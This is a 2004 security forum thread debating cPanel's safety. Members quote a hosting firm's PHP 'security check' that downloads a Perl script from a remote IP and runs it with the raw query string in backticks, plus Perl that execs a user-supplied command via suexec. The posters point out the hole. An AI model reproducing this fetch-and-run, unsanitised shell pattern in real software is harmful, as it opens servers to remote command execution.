|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
How secure is Cpanel? |
|
Posted: Wed Jun 02, 2004 2:10 pm |
|
|
Saladin |
Regular user |
|
|
Joined: May 26, 2004 |
Posts: 19 |
|
|
|
|
|
|
|
I use on my Server Cpanel and WHM Reseller Account , there i can create new SQL DB and also there is phpMyAdmin installed.. |
|
Last edited by Saladin on Thu Jun 03, 2004 7:34 am; edited 1 time in total |
|
|
|
|
Re: How sure is Cpanel? |
|
Posted: Wed Jun 02, 2004 9:07 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
Saladin wrote: | I use on my Server Cpanel and WHM Reseller Account , there i create new SQL DB and also there is phpMyAdmin installed.. |
?????? |
|
|
|
|
Posted: Wed Jun 02, 2004 9:44 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You mean, how secure is CPanel? I remember, that saw not so much time ago in bugtraq some report about XSS cases in CPanel... |
|
|
|
|
Posted: Fri Jun 04, 2004 7:30 am |
|
|
b0ilz |
Regular user |
|
|
Joined: May 31, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
There was a remote root vuln in cpanel. And I saw over 5 exploits for it in under a day. Many boxes were rooted that week. Cpanel has a simple to use update feature, which saved alot of admin's asses.
this bug was elementry. If that is any indication of the security in cpanel I would not say it is secure. (there has also been root post-auth, and a local root in cpanel in the last year or 2). |
|
|
|
|
|
heh |
|
Posted: Fri Jun 04, 2004 9:48 am |
|
|
icenix |
Advanced user |
|
|
Joined: May 13, 2004 |
Posts: 106 |
Location: Australia |
|
|
|
|
|
|
i wouldnt be too scared of it if i were you.
its pretty secure stuff.
plus if there is any bugs etc.. its easily updated in the client as Slad said...
should be no probs.
most of the probs are just bugs etc in the thing that just occasionally screw up.
if your running it on a server you can touch...then just switch it off when you dont want to use it, and turn it on when you do..
thats always an option..
but i dont belive there should be any reall serious questioning of the security of the server when installing CPanel.
ive made a topic with all sorts of Web Control Pannels
you will find it usefull...
it is available Here
( http://www.waraxe.us/forum/viewtopic.php?t=101 ) |
|
|
|
|
Posted: Fri Jun 04, 2004 10:22 pm |
|
|
Stonecold |
Regular user |
|
|
Joined: May 20, 2004 |
Posts: 10 |
Location: Virginia |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 12:55 am |
|
|
b0ilz |
Regular user |
|
|
Joined: May 31, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
This is from http://206.71.87.80/cpanel.php
Code: | <!--
# PROGRAM: cpanel.php
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
-->
<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://206.71.87.106/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
echo `perl $tester '$QUERY_STRING' 2>&1`;
?> |
This is a remotely exploitable security check. buhahaha
And that's not all.. check out the tests.pl script which is downloaded and ran by cpanel.php http://206.71.87.106/tests.pl
Code: | my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;
if ($cpanel && $common) {
if ($command and $who) {
my $wraptest = "/usr/local/cpanel/wrap";
$cpwrap = 1 if -x $wraptest && -u _;
if ($who eq "root") {
print "<li><font color=yellow><b>SKIPPED</b></font>: suEXEC <code>mod_php</code> Taint Vulnerability Test\n";
print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>\n";
$canexe = $cpwrap;
} else {
mkdir $dummy, 0755;
chdir $dummy;
symlink("/usr/local/cpanel","cpanel");
my $dir = (getpwnam $who)[7];
open (DUMMY,">SafeFile.pm");
$ENV{HOME} = $dir;
print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n};
close DUMMY;
my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`; |
besides these security checks Cpanel is NOT secure. I've found some bugz in it. Do not listen to people who tell you anything is secure. It is probably not. Code your own shit, dont use the web for anything important, and remember.. Do not post to bugtraq.[/code] |
|
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 12:59 am |
|
|
b0ilz |
Regular user |
|
|
Joined: May 31, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
btw, these a-squad.com guys are retards. rm them with no remorse. |
|
|
|
|
Posted: Wed Jun 16, 2004 3:01 am |
|
|
vocal |
Regular user |
|
|
Joined: Jun 13, 2004 |
Posts: 18 |
|
|
|
|
|
|
|
Code: |
<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://206.71.87.106/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
|
If it's in this part, I can't see it
I guess you mean the $QUERY_STRING. |
|
|
|
|
|
|
|
|
Posted: Wed Jun 16, 2004 8:08 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Heh, they use backticks without any precaution and sanitize
b0ilz wrote: | This is from http://206.71.87.80/cpanel.php
Code: | <!--
# PROGRAM: cpanel.php
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
-->
<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://206.71.87.106/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
echo `perl $tester '$QUERY_STRING' 2>&1`;
?> |
This is a remotely exploitable security check. buhahaha
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jun 27, 2004 9:05 am |
|
|
HypNotic |
Beginner |
|
|
Joined: Jun 26, 2004 |
Posts: 1 |
|
|
|
|
|
|
|
|
_________________ Root Of The Net |
|
|
|
Posted: Fri Feb 25, 2005 11:17 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
BTW If I see anyone here using zPanel that cheap rip off of cPanel I swear I'll take you down. First of all its a friken rip off and secondly it sucks ass. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> MySql
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|